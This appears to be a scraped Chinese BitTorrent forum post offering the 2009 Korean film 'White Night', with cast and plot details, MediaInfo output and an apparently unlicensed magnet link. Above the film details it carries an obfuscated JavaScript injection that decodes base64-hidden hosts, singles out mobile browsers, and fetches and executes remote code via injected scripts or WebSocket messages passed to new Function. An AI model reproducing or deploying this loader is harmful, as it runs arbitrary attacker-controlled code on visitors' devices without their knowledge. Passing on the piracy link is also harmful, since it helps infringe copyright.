白夜行[中文字幕].White.Night.2009.1080p.BluRay.x265.10bit.DTS 7.27GB

版主小s 1月前 583

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 白夜行/Into The White Night/白夜行:走进白色的黑夜
◎片  名 ??? : ?? ?? ?? ??
◎年  代 2009
◎产  地 韩国
◎类  别 爱情 / 悬疑
◎语  言 韩语
◎上映日期 2009-11-19(韩国)
◎豆瓣评分 7.0/10 from 55601 users
◎豆瓣链接 https://movie.douban.com/subject/3822842/
◎片  长 135分钟
◎导  演 朴信宇 Shin-woo Park
◎编  剧 东野圭吾 Keigo Higashino / 朴信宇 Shin-woo Park
◎主  演 孙艺珍 Ye-jin Son
       韩石圭 Suk-kyu Han
       高修 Soo Go
       李珉廷 Min-jung Lee
       朱多英 Da-Yeong Ju
       朴圣雄 Seong-Woong Park
       李昌旭 Lee Chang-wook
       郑镇 Jung Jin
       尹多景 Da-kyung Yoon
       安秀浩 Soo-ho Ahn
       方中贤 Joong-hyeon Bang
       朴镇宇 Park Jin-woo
       车华妍 Hwa-yeon Cha
       郑仁基 In-gi Jeong
       林智奎 Ji-gyu Lim
       朱雅凛 Ah-reum Joo

◎标  签 孙艺珍 | 东野圭吾 | 韩国 | 韩国电影 | 悬疑 | 白夜行 | 爱情 | 白夜行韩版

◎简  介

  太阳到达最高点的时候,它的影子便消失了。刑警韩东秀(韩石圭 饰)为了证实自己对一起已有定论的杀人案的猜想,致使自己的儿子意外身亡,从此变得意志消沉起来。14年后,一桩杀人案似乎和当年这起案件有着某种联系,当韩东秀再一次开始关注起当年一名被害人的儿子有汉(高修 饰)时,意外认识正在帮助财团老板调查未婚妻柳美皓(孙艺珍 饰)的私家侦探,从私家侦探那里得知这名叫柳皓美的女人正是当年被认为是畏罪自杀的凶手的女儿李佳。当年这两个韩东秀曾经有怀疑过的小孩子如今长大成人,而且又同样因为凶杀案出现在他的周围。在韩东秀的追查过程中,他发现了当年凶杀案以及近期凶杀案的真相,而真相背后,却是一对永远不能在光天化日之下见面的苦恋情侣。
  
  影片改编自日本著名推理小说家东野圭吾的同名小说《白夜行》。小说曾在日本被拍成电视剧,并大获成功。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 77351974484246837882515252763756010841 (0x3A3172C9CBE17760626865D50EDF1D59)

  4. Complete name                            : [email protected]v

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 7.27 GiB

  8. Duration                                 : 2 h 16 min

  9. Overall bit rate                         : 7 656 kb/s

  10. Movie name                               : WHITE_NIGHT

  11. Encoded date                             : UTC 2021-08-27 04:09:53

  12. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover                                    : Yes

  15. Attachments                              : cover.jpg


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@Main

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 2 h 16 min

  23. Bit rate                                 : 6 114 kb/s

  24. Width                                    : 1 916 pixels

  25. Height                                   : 816 pixels

  26. Display aspect ratio                     : 2.35:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 23.976 (24000/1001/53354) FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.163

  33. Stream size                              : 5.81 GiB (80%)

  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings                        : rc=crf / crf=16.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1916x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Language                                 : Korean

  37. Default                                  : Yes

  38. Forced                                   : No


  39. Audio

  40. ID                                       : 2

  41. Format                                   : DTS

  42. Format/Info                              : Digital Theater Systems

  43. Codec ID                                 : A_DTS

  44. Duration                                 : 2 h 15 min

  45. Bit rate mode                            : Constant

  46. Bit rate                                 : 1 509 kb/s

  47. Channel(s)                               : 6 channels

  48. Channel layout                           : C L R Ls Rs LFE

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 93.750 FPS (512 SPF)

  51. Bit depth                                : 24 bits

  52. Compression mode                         : Lossy

  53. Stream size                              : 1.43 GiB (20%)

  54. Language                                 : Korean

  55. Default                                  : Yes

  56. Forced                                   : No


  57. Text #1

  58. ID                                       : 3

  59. Format                                   : PGS

  60. Muxing mode                              : zlib

  61. Codec ID                                 : S_HDMV/PGS

  62. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration                                 : 2 h 7 min

  64. Bit rate                                 : 15.7 kb/s

  65. Count of elements                        : 2026

  66. Stream size                              : 14.3 MiB (0%)

  67. Title                                    : chs

  68. Language                                 : Chinese

  69. Default                                  : Yes

  70. Forced                                   : No


  71. Text #2

  72. ID                                       : 4

  73. Format                                   : PGS

  74. Muxing mode                              : zlib

  75. Codec ID                                 : S_HDMV/PGS

  76. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  77. Duration                                 : 2 h 7 min

  78. Bit rate                                 : 15.8 kb/s

  79. Count of elements                        : 2026

  80. Stream size                              : 14.4 MiB (0%)

  81. Title                                    : cht

  82. Language                                 : Chinese

  83. Default                                  : No

  84. Forced                                   : No


  85. Text #3

  86. ID                                       : 5

  87. Format                                   : PGS

  88. Muxing mode                              : zlib

  89. Codec ID                                 : S_HDMV/PGS

  90. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  91. Duration                                 : 2 h 9 min

  92. Bit rate                                 : 18.4 kb/s

  93. Count of elements                        : 1819

  94. Stream size                              : 17.1 MiB (0%)

  95. Title                                    : kor

  96. Language                                 : Korean

  97. Default                                  : No

  98. Forced                                   : No


  99. Text #4

  100. ID                                       : 6

  101. Format                                   : PGS

  102. Muxing mode                              : zlib

  103. Codec ID                                 : S_HDMV/PGS

  104. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  105. Duration                                 : 2 h 9 min

  106. Bit rate                                 : 21.9 kb/s

  107. Count of elements                        : 1808

  108. Stream size                              : 20.4 MiB (0%)

  109. Title                                    : eng

  110. Language                                 : English

  111. Default                                  : No

  112. Forced                                   : No


  113. Menu

  114. 00:00:00.000                             : 第 01 章

  115. 00:05:13.021                             : 第 02 章

  116. 00:10:00.641                             : 第 03 章

  117. 00:14:18.148                             : 第 04 章

  118. 00:19:46.935                             : 第 05 章

  119. 00:27:13.089                             : 第 06 章

  120. 00:33:34.011                             : 第 07 章

  121. 00:37:48.391                             : 第 08 章

  122. 00:43:09.753                             : 第 09 章

  123. 00:50:15.971                             : 第 10 章

  124. 00:54:51.413                             : 第 11 章

  125. 00:59:33.569                             : 第 12 章

  126. 01:05:41.771                             : 第 13 章

  127. 01:11:45.217                             : 第 14 章

  128. 01:19:15.167                             : 第 15 章

  129. 01:25:32.252                             : 第 16 章

  130. 01:33:26.559                             : 第 17 章

  131. 01:41:51.814                             : 第 18 章

  132. 01:47:42.164                             : 第 19 章

  133. 01:52:52.140                             : 第 20 章

  134. 01:57:40.803                             : 第 21 章

  135. 02:03:35.324                             : 第 22 章

  136. 02:11:12.823                             : 第 23 章

  137. 02:12:42.746                             : 第 24 章



TAGS 悬疑 爱情

磁力链:
  • magnet:?xt=urn:btih:569C93C0C1AA44CF3C5C7756F4B7B72947286900
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖